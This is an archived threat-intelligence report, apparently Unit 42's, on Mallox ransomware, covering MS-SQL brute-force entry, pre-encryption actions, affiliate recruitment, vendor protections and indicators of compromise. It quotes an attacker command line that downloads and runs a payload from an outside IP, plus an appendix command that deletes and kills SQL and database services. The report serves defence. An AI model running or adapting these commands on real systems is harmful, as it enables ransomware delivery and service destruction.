{
	"id": "0c3e19c4-d4cf-4e03-bbce-5357d72531ad",
	"created_at": "2026-04-06T00:15:16.25822Z",
	"updated_at": "2026-04-10T13:12:32.704045Z",
	"deleted_at": null,
	"sha1_hash": "782fcd13b87464c272b73cdc5e89186422fd5851",
	"title": "Threat Group Assessment: Mallox Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1039324,
	"plain_text": "Threat Group Assessment: Mallox Ransomware\r\nBy Lior Rochberger, Shimi Cohen\r\nPublished: 2023-07-20 · Archived: 2026-04-05 16:22:09 UTC\r\nExecutive Summary\r\nMallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft (MS) Windows\r\nsystems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a\r\npenetration vector to compromise victims' networks.\r\nRecently, Unit 42 researchers have observed an uptick of Mallox ransomware activities – with an increase of\r\nalmost 174% compared to the previous year – exploiting MS-SQL servers to distribute the ransomware. Unit 42\r\nincident responders have observed Mallox ransomware using brute forcing, data exfiltration and tools such as\r\nnetwork scanners. In addition, we have found indications that the group is working on expanding their operations\r\nand recruiting affiliates on hacking forums.\r\nPalo Alto Networks customers receive protections from Mallox ransomware and the techniques discussed in this\r\nblog through Cortex XDR, which provides a multilayer defense that includes behavioral threat protection and\r\nexploit protection.\r\nVideo showing Cortex preventing the execution of the Mallox ransomware.\r\nThe Advanced WildFire cloud-delivered malware analysis service accurately identifies samples related to Mallox\r\nas malicious. Cloud-Delivered Security Services, including Advanced URL Filtering and DNS Security identify\r\ndomains associated with this group as malicious.\r\nIf you believe you have been compromised, the Unit 42 Incident Response team can provide a personalized\r\nresponse.\r\nOverview of Mallox Ransomware\r\nMallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data\r\nbefore encrypting an organization’s files, and then threatening to publish the stolen data on a leak site as leverage\r\nto convince victims to pay the ransom fee.\r\nFigure 1 below displays the Mallox ransomware website on the Tor browser. Though the organizations’ names and\r\nlogos have been redacted, this is how the group displays the leaked data of its targets.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 1 of 13\n\nFigure 1. Mallox website on Tor browser.\r\nEach victim is given a private key to interact with the group and negotiate terms and payment. Figure 2 below\r\npresents the chat used for communicating with the group.\r\nFigure 2. Mallox private chat Tor website.\r\nThe Mallox ransomware group claims hundreds of victims. While the actual number of victims remains unknown,\r\nour telemetry indicates dozens of potential victims worldwide, across multiple industries, including\r\nmanufacturing, professional and legal services, and wholesale and retail.\r\nSince the beginning of 2023, there has been a constant uptick in Mallox activities. According to our telemetry and\r\ndata collected from open threat intel sources, in 2023, there has been an increase of approximately 174% in\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 2 of 13\n\nMallox attacks compared to the latter half of 2022 (see Figure 3).\r\nFigure 3. Mallox attack attempts from the second half of 2022 to the first half of 2023, based on\r\nPalo Alto Networks' telemetry.\r\nInitial Access\r\nSince its emergence in 2021, the Mallox group has kept the same approach to gaining initial access: The group\r\ntargets unsecured MS-SQL servers to infiltrate a network. These attacks start with a dictionary brute force attack,\r\ntrying a list of known or commonly used passwords against the MS-SQL servers. After gaining access, the\r\nattackers use a command line and PowerShell to download the Mallox ransomware payload from a remote server\r\n(see Figure 4).\r\nFigure 4. Example of an alert raised in response to a Mallox ransomware dictionary brute force\r\nattack, as raised by Cortex XDR and XSIAM.\r\nA command line example used for a Mallox ransomware infection:\r\n\"\\\"C:\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\" /C echo $cl = New-Object System.Net.WebClient \u003e\r\nC:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 \u0026 echo\r\n$cl.DownloadFile(\\\"hxxp://80.66.75[.]36/aRX.exe\\\",\r\n\\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\") \u003e\u003e %TEMP%\\\\updt.ps1 \u0026 powershell -\r\nExecutionPolicy Bypass C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 \u0026 WMIC process call\r\ncreate \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\"\"\r\nThis command line does the following:\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 3 of 13\n\nDownloads the ransomware payload from: hxxp://80.66.75[.]36/aRX.exe, and saves it as tzt.exe\r\nRuns a PowerShell script named updt.ps1\r\nThe payload then goes on to do the following (not pictured in the command line script shown above):\r\nDownloads another file named system.bat, and saves it as tzt.bat\r\nThe tzt.bat file is used to create a user named SystemHelp and enable the remote desktop (RDP) protocol\r\nExecutes the ransomware payload tzt.exe using Windows Management Instrumentation (WMI)\r\nFigure 5 below shows how Cortex XDR and XSIAM detect one of the first phases of the SQL server exploitation,\r\nas described above.\r\nFigure 5. SQL server exploitation process tree, as shown by Cortex XDR and XSIAM (set to detect-only mode for testing purposes).\r\nRansomware Execution\r\nBefore any encryption takes place, the ransomware payload attempts multiple actions to ensure successful\r\nexecution of the ransomware, such as:\r\nAttempts to stop and remove SQL-related services using sc.exe and net.exe (see the Appendix for the full\r\ncommand line). This way, the ransomware can access and encrypt the victim’s file data.\r\nAttempts to delete volume shadows, making it harder to restore files once they are encrypted. See Figure 6\r\nfor how this alert appears in Cortex XDR and XSIAM.\r\nFigure 6. Alert for deleting shadow copies, raised by Cortex XDR and XSIAM.\r\nAttempts to clear the application, security, setup and system event logs using Microsoft’s wevtutil\r\ncommand line utility to thwart detection and forensic analysis efforts.\r\nModifies file permission using the Windows built-in takeown.exe command, denying access to cmd.exe\r\nand other key system processes.\r\nPrevents the system administrator from manually loading the System Image Recovery feature using\r\nbcdedit.exe.\r\nAttempts to terminate security-related processes and services using taskkill.exe to evade security solutions.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 4 of 13\n\nAttempts to bypass the Raccine anti-ransomware product, if present, by deleting its registry key. See Figure\r\n7 for an example of this process.\r\nFigure 7. Deleting the Raccine registry key.\r\nIn Figure 8, some of these mentioned activities are shown in the process tree of the ransomware:\r\nFigure 8. A full process tree of the attack, as shown by Cortex XDR and XSIAM (set to detect-only\r\nmode for testing purposes).\r\nThis investigated sample of Mallox ransomware encrypts files using the ChaCha20 encryption algorithm and\r\nappends the .malox extension for the encrypted files. Other file extensions observed were: .FARGO3, .exploit,\r\n.avast, .bitenc and .xollam, in addition to the use of victims’ names as the extension. See Figure 9 for an example\r\nof encrypted files in Cortex XDR.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 5 of 13\n\nFigure 9. Examples of files encrypted by Mallox ransomware, as detected by Cortex XDR (set to\r\ndetect-only mode).\r\nMallox leaves a ransom note in every directory on the victim’s drive. This ransom note explains the infection and\r\nprovides contact information. Figure 10 is an example of one of these ransom notes.\r\nFigure 10. Example of Mallox ransom note.\r\nAfter execution, the malware deletes itself.\r\nGrowing Potential\r\nAccording to one of its members – as stated in an interview in January 2023 – Mallox is a relatively small and\r\nclosed group. However, the group appears to be working to expand its operations by recruiting affiliates.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 6 of 13\n\nA few days after this interview, a user named Mallx posted on the hacking forum RAMP that the Mallox\r\nransomware group was recruiting affiliates for a new Mallox ransomware-as-a-service (RaaS) affiliate program, as\r\nshown in Figure 11.\r\nFigure 11. User Mallx's post on RAMP.\r\nBack in May 2022, a user named RansomR posted on the well-known hacking forum nulled[.]to that the Mallox\r\ngroup was looking for affiliates to join the team. As of June 2023, the option to join is still relevant, according to\r\nthe comments in the thread.\r\nFigure 12. RansomR's post on Nulled.\r\nIf recruitment efforts for their affiliate program succeed, the Mallox group might expand its reach to target more\r\norganizations.\r\nConclusion\r\nThe Mallox ransomware group has been more active in the past few months, and their recent recruiting efforts\r\nmay enable them to attack more organizations if the recruitment drive is successful.\r\nOrganizations should implement security best practices and be prepared to defend against the ongoing threat of\r\nransomware. This is true not only for Mallox ransomware but for other opportunistic criminal groups as well.\r\nThe Unit 42 team recommends making sure that all internet-facing applications are configured properly and all\r\nsystems are patched and up to date wherever possible. These measures will help to reduce the attack surface,\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 7 of 13\n\nthereby limiting the exploitation techniques available to attackers.\r\nDeploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. Perform\r\nthreat hunting, looking for signs of unusual behavior related to security product defense evasion, service accounts\r\nfor lateral movement and domain administrator-related user behavior.\r\nProtections and Mitigations\r\nPalo Alto Networks Cortex XDR detects and prevents file manipulation and other activities performed by Mallox\r\nransomware.\r\nFigure 13. End user notification for blocking the Mallox execution.\r\nFigure 14. Alert for suspicious file modification, raised by the Cortex XDR and XSIAM (set to\r\ndetect-only mode for testing purposes).\r\nSmartScore, A unique ML-driven scoring engine that translates security investigation methods and their associated\r\ndata into a hybrid scoring system, scored an incident involving Mallox ransomware at 100, which is its highest\r\nlevel of severity (Figure 15). This type of scoring helps analysts determine which incidents are more urgent and\r\nprovides context about the reason for the assessment, assisting with prioritization.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 8 of 13\n\nFigure 15. SmartScore information about a Mallox ransomware incident.\r\nFor Palo Alto Networks customers, our products and services provide the following coverage against Mallox\r\nransomware:\r\nWildFire cloud-based threat analysis service identifies the known samples as malicious.\r\nAdvanced URL Filtering and DNS Security identify domains associated with this group as malicious.\r\nCortex XDR detects user and credential-based threats by analyzing user activity from multiple data\r\nsources, including endpoints, network firewalls, Active Directory, identity and access management\r\nsolutions, and cloud workloads. Cortex XDR also builds behavioral profiles of user activity with machine\r\nlearning. By comparing new activity to past activity, peer activity and the expected behavior, Cortex XDR\r\ndetects anomalous activity indicative of credential-based attacks. Cortex XDR also offers the following\r\nprotections related to the attacks discussed in this post:\r\nPrevents the execution of known malicious malware, and prevents the execution of unknown\r\nmalware using Behavioral Threat Protection and machine learning based on the Local Analysis\r\nmodule.\r\nProtects against credential gathering tools and techniques using the new Credential Gathering\r\nProtection available from Cortex XDR 3.4.\r\nProtects from threat actors dropping and executing commands from webshells using Anti Webshell\r\nProtection as of Cortex XDR 3.4.\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 9 of 13\n\nProtects against exploitation of different vulnerabilities, including ProxyShell, ProxyLogon and\r\nOWASSRF, using the Anti-Exploitation modules as well as Behavioral Threat Protection.\r\nCortex XDR Pro detects post-exploit activity, including credential-based attacks, with Cortex\r\nAnalytics.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to\r\ntheir customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nAppendix\r\nCommand line Used by Mallox To Stop and Remove SQL-Related Services\r\n\"C:\\Windows\\System32\\cmd.exe\" / C sc delete \"MSSQLFDLauncher\" \u0026\u0026 sc delete \"MSSQLSERVER\" \u0026\u0026 sc\r\ndelete \"SQLSERVERAGENT\" \u0026\u0026 sc delete \"SQLBrowser\" \u0026\u0026 sc delete \"SQLTELEMETRY\" \u0026\u0026 sc delete\r\n\"MsDtsServer130\" \u0026\u0026 sc delete \"SSISTELEMETRY130\" \u0026\u0026 sc delete \"SQLWriter\" \u0026\u0026 sc delete\r\n\"MSSQL$VEEAMSQL2012\" \u0026\u0026 sc delete \"SQLAgent$VEEAMSQL2012\" \u0026\u0026 sc delete \"MSSQL\" \u0026\u0026 sc\r\ndelete \"SQLAgent\" \u0026\u0026 sc delete \"MSSQLServerADHelper100\" \u0026\u0026 sc delete \"MSSQLServerOLAPService\"\r\n\u0026\u0026 sc delete \"MsDtsServer100\" \u0026\u0026 sc delete \"ReportServer\" \u0026\u0026 sc delete \"SQLTELEMETRY$HL\" \u0026\u0026 sc\r\ndelete \"TMBMServer\" \u0026\u0026 sc delete \"MSSQL$PROGID\" \u0026\u0026 sc delete \"MSSQL$WOLTERSKLUWER\" \u0026\u0026 sc\r\ndelete \"SQLAgent$PROGID\" \u0026\u0026 sc delete \"SQLAgent$WOLTERSKLUWER\" \u0026\u0026 sc delete\r\n\"MSSQLFDLauncher$OPTIMA\" \u0026\u0026 sc delete \"MSSQL$OPTIMA\" \u0026\u0026 sc delete \"SQLAgent$OPTIMA\" \u0026\u0026\r\nsc delete \"ReportServer$OPTIMA\" \u0026\u0026 sc delete \"msftesql$SQLEXPRESS\" \u0026\u0026 sc delete \"postgresql-x64-9.4\"\r\n\u0026\u0026 rem Kill \"SQL\" \u0026\u0026 taskkill - f - im sqlbrowser.exe \u0026\u0026 taskkill - f - im sqlwriter.exe \u0026\u0026 taskkill - f - im\r\nsqlservr.exe \u0026\u0026 taskkill - f - im msmdsrv.exe \u0026\u0026 taskkill - f - im MsDtsSrvr.exe \u0026\u0026 taskkill - f - im sqlceip.exe\r\n\u0026\u0026 taskkill - f - im fdlauncher.exe \u0026\u0026 taskkill - f - im Ssms.exe \u0026\u0026 taskkill - f - im SQLAGENT.EXE \u0026\u0026\r\ntaskkill - f - im fdhost.exe \u0026\u0026 taskkill - f - im fdlauncher.exe \u0026\u0026 taskkill - f - im sqlservr.exe \u0026\u0026 taskkill - f - im\r\nReportingServicesService.exe \u0026\u0026 taskkill - f - im msftesql.exe \u0026\u0026 taskkill - f - im pg_ctl.exe \u0026\u0026 taskkill - f - im\r\npostgres.exe\r\nIndicators of Compromise\r\nSHA256 hashes for Mallox ransomware samples:\r\n6c743c890151d0719150246382b5e0158e8abc4a29dd4b2f049ce7d313b1a330\r\nb03f94c61528c9f3731a2e8da4975c072c9ed4e5372d3ec6b0939eebe01e54a4\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 10 of 13\n\nde9d3e17555e91072919dc700dc7e588cd52617debcad2f764ef9c7fbf6c9f7b\r\n2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439\r\n1c8b6d5b79d7d909b7ee22cccf8f71c1bd8182eedfb9960c94776620e4543d13\r\n36269d1892283991a9db23492cd8efcd68af74060384b9686219a97f76a9989e\r\n10eea0c13fd1a782c065627e23e7051edc1622f2eae5fbe138725369c12f4b6d\r\nDf30d74ab6600c1532a14c53a7f08f1afd41ec63cf427a4b91b99c3c2524caba\r\n0463277782f9e98b0e7a028cea0f689a81cf080fa0d64d4de8ef4803bb1bf03a\r\n1f793f973fd906f9736aa483c613b82d5d2d7b0e270c5c903704f9665d9e1185\r\ne284ad63a832123240bd40b6c09565fae8525c00ddf308d5b8f5c8ce69ed6b09\r\ne3a0bbd623db2b865fc3520c8d05e8b92016af2e535f0808460295cb8435836a\r\n7c84eafb3b05f0d5316fae610d9404c54ef39383d0fe0e3c07407a26bb9f6750\r\n1276786fc51f3b7e987aa95ebff0a3e1e358ee4e86e2302e472f84710271af7b\r\nf730e83049c7fe81f6e4765ab91efbb7a373751d51fdafe697a4977dc7c1ea11\r\n05194b34f8ff89facdd7b56d05826b08edaec9c6e444bdc32913e02cab01afd4\r\nc599bebc9ae54a54710008042361293d71475e5fbe8f0cbaceb6ee4565a72015\r\n060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096\r\n90be90ad4fb906574f9e7afe587f0826a71152bfc32cfc665a58877562f2edd4\r\n1b2727af9fc187cd5c932c6defe50b983ad7508b4196ad6c5ff5e96686277c56\r\na9543bc9612276863fc77b663fa3ff6efb85db69a01baa86c6dfabf73684b5c1\r\n4e00f3e0e09d13e76da56009173098eefafc4ad50806583d5333990fa44e6420\r\n6c109d098a1f44017f3937a71628d9dbd4d2ca8aa266656ee4720c37cc31558e\r\n7f8f1afa1390246409263e606aa05e2896b8d1da7018c534e67ca530a59ebda1\r\n8e54c38bc3585c3163c3e25d037bcf55695c274aaea770f2f59f0a0910a4b572\r\n724aa6dae72829e9812b753d188190e16fb64ac6cd39520897d917cfdccc5122\r\n7164ba41639c8edcd9ff1cf41a806c9a23de566b56a7f34a0205ba1f84575a48\r\n0e1c7ea4148e7473e15a8e55413d6972eec6e24ef365e9f629884f89645de71a\r\n4ed74a205fad15c843174d7d8b30ae60a181e79f31cc30ebc683072f187e4cdd\r\nee6fd436bf5aff181e3d4b9a944bf644076e902a1bbf622978b5e005522c1f77\r\nebdcf54719cceddffc3c254b0bfb1a2b2c8a136fa207293dbba8110f066d9c51\r\n9a3050007e1c46e226e7c2c27d4703f63962803863290449193a0d0ca9661b3b\r\nd6c51935d0597b44f45f1b36d65d3b01b6401593f95cb4c2786034072ad89b63\r\n586d4f86615cb3a8709ae1c08dde35087580814c1d1315af3d7b932639ff48e0\r\n8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22\r\n3fa36079fdc548db1b5122450c2e4c9e40c37059de116d1c03f6459b13fc2dc4\r\nD15f12a7cf2e8ec3d6fceabfab64956c7e727caab91cff9c664f92b5c8552570\r\n0427a9f68d2385f7d5ba9e9c8e5c7f1b6e829868ef0a8bc89b2f6dae2f2020c4\r\n4cbac922af3cfaba5fa7a3251bd05337bffd9ed0ada77c55bb4f78a041f4ebf2\r\n10f96f64659415e46c3f2f823bdb855aab42d0bfced811c9a3b72aea5f22d880\r\n5ccff9af23c18998221f45396732539d18e330454327d1e7450095c682d8c552\r\n77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5\r\nee08e3366c04574f25909494ef276e65e98d54f226c0f8e51922247ca3cfade9\r\n2fd3c8fab2cfaaabf53d6c50e515dd5d1ef6eceeebdd5509c23030c4d54cb014\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 11 of 13\n\n603846d113ef1f588d9a3a695917191791fbad441f742bcfe797813f9fc5291e\r\na5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525\r\n9b833d5b4bdbc516e4773c489ced531b13028094ce610e96ebc30d3335458a97\r\nb9e895830878124e20293f477549329d4d8752ff118f4fe893d81b3a30852c0b\r\ncd80506f971b95b3b831cef91bb2ec422b1a27301f26d5deac8e19f163f0839a\r\nc0e35b19f97021416e3724006511afc95d6aa409404e812d8c62b955bc917d3c\r\n342930d44aed72f826a3f0f4a3964158f2bd86fb53703fb3daa6c937b28a53e4\r\n9ee35c6eb97230cd9b61ba32dba7befea4122f89b3747d2389970050a1d019f9\r\ne7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009\r\ne3f63ab8ef91e0c52384c0e3e350db2427c8cb9237355800a3443b341cf8cf4f\r\nf7e8a0eac54dd040e2609546fca263f2c2753802ff57e7c62d5e9ccfa04bdb1a\r\ne7178a4bad4407316b85894307df32fdf85b597455364eb8ec4d407749e852ce\r\nSHA256 hashes for PowerShell scripts Updt.ps1 and Upddt.ps1\r\ndcc9e23fd6ac926eb9ee7e0ee422dacd2059b4a42c8642d32bdf4f5c8eb33f6a\r\nfead3d518752ddb4d2407f16ca5f3c9b3c0bf01972a2618369d02913f7c6af1a\r\n0901a9920c9f0c74fb2170524477693d62c8493715520ae95143abd8055e7a39\r\nba97fd533e8a552664695434227b24ca1e2e661c360a7a0a40ff59ba6b8fe949\r\n53da732df7599f5ad21a26b669500788a827f3a8358dcdca10997d2b8187c95c\r\n189c9c4603defb14fa8c942f5ff7814804654269917640478686530f91c4b66c\r\nfd0030883b9e74b383ee6381a2aaa7e2e5b93a00003b555e2f7c8b7be65ab176\r\nd22b3218c4b7f13fe114854d1dbda02c3ad94a1b6c69daa1cf6a504ada8b8bca\r\nb6447b0636085fcb41fd574e84500958f21dfe87fe06b0813fb9399d63f28851\r\n5c34f6fa6eada3197404bf95eced9d288688537598629158a4f4e18d6882cb9b\r\nd81b0425d4ec49bad194b8dc750524c2a29994fe972e733376349f47961cfa62\r\nSystem.bat\r\n1e2515efb64200258752d785863fd35df6039441a80cb615dfff4fbdffb484ec\r\n777a5782426e5b42e0e5e8445dd9602d123e8acc27aca4daa8e9c053f3d5b899\r\n9e3684be0b4c2dc93f962c03275e050fed57d9be6411396f51bdf8d4bb5e21c0\r\ncb47327c7cce30cff8962c48fa3b51e57e331e1592ea78b21589164c5396ccd9\r\nIP addresses related to Mallox ransomware activity\r\n103.96.72[.]140\r\n80.66.75[.]36\r\n80.66.75[.]37\r\n80.66.75[.]126\r\n80.66.75[.]116\r\n92.118.148[.]227\r\n62.122.184[.]113\r\n87.251.64[.]245\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 12 of 13\n\n119.3.125[.]197\r\n49.235.255[.]219\r\n80.66.75[.]55\r\n87.251.67[.]92\r\n121.4.69[.]26\r\n124.223.11[.]169\r\n45.93.201[.]74\r\n80.66.75[.]135\r\n194.26.135[.]44\r\n80.66.75[.]51\r\n89.117.55[.]149\r\n5.181.86[.]241\r\n185.170.144[.]153\r\nAdditional Resources\r\nRansomware Spotlight: TargetCompany – Trend Micro\r\nXollam, the Latest Face of TargetCompany – Trend Micro\r\nMallox Ransomware – K7 Security Labs, Blog\r\nFARGO Ransomware (Mallox) Being Distributed to Unsecured MS-SQL Servers – ASEC Blog, AhnLab\r\nInterview With Mallox Ransomware Group – SuspectFile\r\nSource: https://unit42.paloaltonetworks.com/mallox-ransomware/\r\nhttps://unit42.paloaltonetworks.com/mallox-ransomware/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/mallox-ransomware/"
	],
	"report_names": [
		"mallox-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.pdf",
		"text": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.txt",
		"img": "https://archive.orkl.eu/782fcd13b87464c272b73cdc5e89186422fd5851.jpg"
	}
}